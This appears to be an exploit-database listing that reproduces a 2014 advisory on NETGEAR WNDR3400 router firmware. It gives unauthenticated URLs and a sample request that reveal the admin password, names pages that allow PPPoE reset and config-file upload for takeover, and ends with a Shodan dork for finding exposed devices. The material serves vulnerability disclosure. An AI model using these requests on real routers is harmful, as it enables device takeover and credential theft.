header-logo
Suggest Exploit
vendor:
N600 WIRELESS DUAL BAND WNDR3400
by:
Santhosh Kumar
8,8
CVSS
HIGH
Password Disclosure File Uploading with AuthPPOPE settings Change
200
CWE
Product Name: N600 WIRELESS DUAL BAND WNDR3400
Affected Version From: Firmware Version 1.0.0.38
Affected Version To: ALL versions
Patch Exists: NO
Related CWE: N/A
CPE: h:netgear:n600_wireless_dual_band_wndr3400
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400

While testing the Netgear firmware, Santhosh Kumar discovered a password disclosure vulnerability and a file uploading vulnerability which could compromise the entire router. The password disclosure vulnerability can be exploited by sending a request to the server/unauth.cgi?id=393087602 or server:8080/passwordrecovered.cgi?id=1738955828, which will return the admin username and password. The file uploading vulnerability can be exploited by sending a request to the server/unauth.cgi?id=393087602 with the content-type set to application/x-www-form-urlencoded.

Mitigation:

No patch is available from the vendor.
Source

Exploit-DB raw data:

Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400
====================================================================================
Notification Date:  4/14/2014
Affected Vendor:    NETGEAR N600 WIRELESS DUAL BAND WNDR3400
Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected)
Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change
Discovered by: Santhosh Kumar twitter: @security_b0x
Issue status: No Patch >From the Vendors.
grettings: @Anami2111 (anamika singh) -- creator of wihawk



====================================================================================
Summary:
========
While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor.

Password Disclosure:
====================
url: server/unauth.cgi?id=393087602
Generating with the 401 unauthorised error
poc:
Host: server:8080
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://server:8080/
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 0<p class="MNUTitle">Router Password Recovered</p>

	<table border="0" cellpadding="0" cellspacing="3" style="width:600px">
    <col width="200" />
    <col width="400" />
	<tr>
	<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
	</tr>
	<tr>
	<td class="MNUText" align="right">Router Admin Username</td>
	<td class="MNUText" align="left">admin</td>
	</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">password</td>
</tr>
\<tr>

poc2:

server:8080/passwordrecovered.cgi?id=1738955828

<tr>
<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
	<td class="MNUText" align="left">0514</td>
</tr>
<tr>
<td colspan="2" class="MNUText">You can now log in to the router using username "admin" and this recovered password.</td>
</tr>
<tr>

==============================================================================================================================

Ppope account reset:

Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm "

which allows to reset the ppoe username which any basic authentication.

http://server/genie_pppoe.htm

==============================================================================================================================

File Upload (router reset):

like the same one above the "http://server/genie_restore.htm"

the config file can be uploaded which leading to reseting the control to attackers username and password.

*.cfg file.


==============================================================================================================================
SHODAN DORK:
wndr3400: 10198 for wndr3400





******************************************************************************************************************************

Navigation

Suggest Exploit

Services By CQR